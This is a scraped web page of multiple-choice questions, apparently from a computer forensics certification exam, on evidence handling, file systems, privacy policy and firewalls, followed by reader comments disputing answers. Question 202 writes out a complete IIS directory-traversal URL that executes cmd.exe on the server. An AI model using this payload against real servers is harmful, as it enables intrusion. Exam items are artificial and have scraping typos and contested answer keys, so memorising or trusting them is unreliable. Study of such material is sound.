modification, access and</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">change timestamps</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. It can recover deleted file space and search it for datA. However, it does not allow the investigator t</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">preview them</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The tools scans for i-node information, which is used by other tools in the tool kit</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. It is tool specific to the MAC OS and forms a core component of the toolkit</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">192. The use of warning banners helps a company avoid litigation by overcoming an employees assumed</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">__________________________ When connecting to the company.s intranet, network or Virtual Private</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Network(VPN) and will allow the company.s investigators to monitor, search and retrieve information</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">stored within the network.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Right to work</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Right of free speech</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Right to Internet Access</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Right of Privacy</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">193. Chris has been called upon to investigate a hacking incident reported by one of his clients. The company</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">suspects the involvement of an insider accomplice in the attack. Upon reaching the incident scene, Chris</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">secures the physical area, records the scene using visual mediA. He shuts the system down by pulling the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">power plug so that he does not disturb the system in any way. He labels all cables and connectors prior to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">disconnecting any. What do you think would be the next sequence of events?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Connect the target media; prepare the system for acquisition; Secure the evidence; Copy the media</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Prepare the system for acquisition; Connect the target media; copy the media; Secure the evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Connect the target media; Prepare the system for acquisition; Secure the evidence; Copy the media</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Secure the evidence; prepare the system for acquisition; Connect the target media; copy the media</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">194. When investigating a Windows System, it is important to view the contents of the page or swap file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">because:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Windows stores all of the systems configuration information in this file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. This is file that windows use to communicate directly with Registry</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. A Large volume of data can exist within the swap file of which the computer user has no knowledge</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. This is the file that windows use to store the history of the last 100 commands that were run from the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">command line</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">195. A state department site was recently attacked and all the servers had their disks eraseD. The incident</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">response team sealed the area and commenced investigation. During evidence collection they came across a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">zip disks that did not have the standard labeling on it. The incident team ran the disk on an isolated system</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">and found that the system disk was accidentally eraseD. They decided to call in the FBI for further</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">investigation. Meanwhile, they short listed possible suspects including three summer interns. Where did the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">incident team go wrong?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. They examined the actual evidence on an unrelated system</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. They attempted to implicate personnel without proof</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. They tampered with evidence by using it</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. They called in the FBI without correlating with the fingerprint data</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">196. Which of the following refers to the data that might still exist in a cluster even though the original file has</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">been overwritten by another file?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Sector</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Metadata</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. MFT</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Slack Space</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">197. What should you do when approached by a reporter about a case that you are working on or have worked</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">on?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Refer the reporter to the attorney that retained you</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Say, ¡°no comment¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Answer all the reporters questions as completely as possible</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Answer only the questions that help your case</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">198. This is original file structure database that Microsoft originally designed for floppy disks. It is written to the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">outermost track of a disk and contains information about each file stored on the drive.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Master Boot Record (MBR)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Master File Table (MFT)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. File Allocation Table (FAT)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Disk Operating System (DOS)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">199. You are working in the security Department of law firm. One of the attorneys asks you about the topic of</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">sending fake email because he has a client who has been charged with doing just that. His client alleges that</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">he is innocent and that there is no way for a fake email to actually be sent. You inform the attorney that his</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">client is mistaken and that fake email is possibility and that you can prove it. You return to your desk and</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">craft a fake email to the attorney that appears to come from his boss. What port do you send the email to on</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the company SMTP server?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 10</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 25</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 110</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 135</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">200. Volatile Memory is one of the leading problems for forensics. Worms such as code Red are memory</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">resident and do write themselves to the hard drive, if you turn the system off they disappear. In a lab</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">environment, which of the following options would you suggest as the most appropriate to overcome the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">problem of capturing volatile memory?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Use Vmware to be able to capture the data in memory and examine it</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Give the Operating System a minimal amount of memory, forcing it to use a swap file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Create a Separate partition of several hundred megabytes and place the swap file there</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Use intrusion forensic techniques to study memory resident infections</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">201. Diskcopy is:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. a utility byAccessData</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. a standard MS-DOS command</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Digital Intelligence utility</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. dd copying tool</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Explanation:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">diskcopy is a STANDARD DOS utility. C:WINDOWS>diskcopy /? Copies the contents of one floppy disk to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">another.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">202. What will the following URL produce in an unpatched IIS Web Server?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">http://www.thetargetsite.com/scripts/..% co%af../..%co%af../windows/system32/cmD. exe?/c+dir+c:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Directory listing of C: drive on the web server</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Insert a Trojan horse into the C: drive of the web server</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Execute a buffer flow in the C: drive of the web server</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Directory listing of the C:windowssystem32 folder on the web server</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">203. After attending a CEH security seminar, you make a list of changes you would like to perform on your</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">network to increase its security. One of the first things you change is to switch the RestrictAnonymous</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">setting from 0 to 1 on your servers. This, as you were told, would prevent anonymous users from</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">establishing a null session on the server. Using Userinfo tool mentioned at the seminar, you succeed in</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">establishing a null session with one of the servers. Why is that?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. RestrictAnonymous must be set to ¡°10¡È for complete security</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. RestrictAnonymous must be set to ¡°3¡È for complete security</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. RestrictAnonymous must be set to ¡°2¡È for complete security</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. There is no way to always prevent an anonymous null session from establishing</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">204. View the Exhibi:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Paulette works for an IT security consulting company that is currently performing an audit for the firm</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">ACE UnlimiteD. Paulette.s duties include logging on to all the company.s network equipment to ensure</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">IOS versions are up-to-date and all the other security settings are as stringent as possible. Paulette presents</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the following screenshot to her boss so he can inform the client about necessary changes need to be made.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">From the screenshot, what changes should the client company make?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Exhibit:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Remove any identifying numbers, names, or version information</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The banner should have more detail on the version numbers for the networkeQuipment</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The banner should not state ¡°only authorized IT personnel may proceed¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The banner should include the Cisco tech support contact information as well</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">205. You are working as Computer Forensics investigator and are called by the owner of an accounting firm to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">investigate possible computer abuse by one of the firms employees. You meet with the owner of the firm</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">and discover that the company has never published a policy stating that they reserve the right to inspect</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">their computing assets at will. What do you do?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Inform the owner that conducting an investigation without a policy is not a problem because the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">company is privately owned</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Inform the owner that conducting an investigation without a policy is a violation of the 4th amendment</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Inform the owner that conducting an investigation without a policy is a violation of the employees</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">expectation of privacy</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Inform the owner that conducting an investigation without a policy is not a problem because a policy is</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">only necessary for government agencies</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">206. After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">a DMZ, statefull firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">taken, none of the hosts on her network can reach the Internet. Why is that?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Statefull firewalls do not work with packet filtering firewalls</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. NAT does not work withstatefull firewalls</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. IPSEC does not work with packet filtering firewalls</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. NAT does not work with IPSEC</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">1. val says:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">June 26, 2012 at 5:04 am</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">since when NAT doesnt work with IPSEC? none of the answers are correct</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">2. Ay says:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">July 10, 2012 at 6:37 am</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D is correct. Conventional NAT will not work on IPSec packets: when the packet goes through NAT, the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">source address in the packet changes, and that renders the packet invaliD.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">207. John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the traffic produced by Firewalk. Why is that?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Firewalk cannot pass through Cisco firewalls</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Firewalk sets all packets with a TTL of zero</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Firewalk cannot be detected by network sniffers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Firewalk sets all packets with a TTL of one</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">1. val says:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">June 26, 2012 at 5:02 am</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">i have a problem with this answer also. When you do firealwking its not mean you setting all ttl to 1 it</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">could be set a different value other than 0. Now, sniffers cant really detect firewalking, so it should be the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">correct answer</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">2. Ay says:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">July 10, 2012 at 6:26 am</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Firewalk sends out packets with a TTL one greater than the targeted gateway. If the target is one hop</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">count away, firewalk.s packet would have a TTL of 2. Though D is technically wrong, it.s the closest to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the right answer.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">208. You are running through a series of tests on your network to check for any security vulnerabilities. After</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">normal working hours, you initiate a DoS attack against your external firewall. The firewall Quickly</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">internal network. The connection is successful even though you have FTP blocked at the external firewall.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">What has happened?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The firewall failed-bypass</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The firewall failed-closed</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The firewall ACL has been purged</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="background-color: white; font-size: 12px;"></span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The firewall failed-open</span></span></div>

Jawaban FORESEC information security level 4 | 312-49 Computer Hacking Forensic Investigator 2011

Post perdana di tahun 2014, ane mau share soal-soal test FORESEC information security level 4.  Buat temen-temen seperjuangan monggo di d...

lengkapnya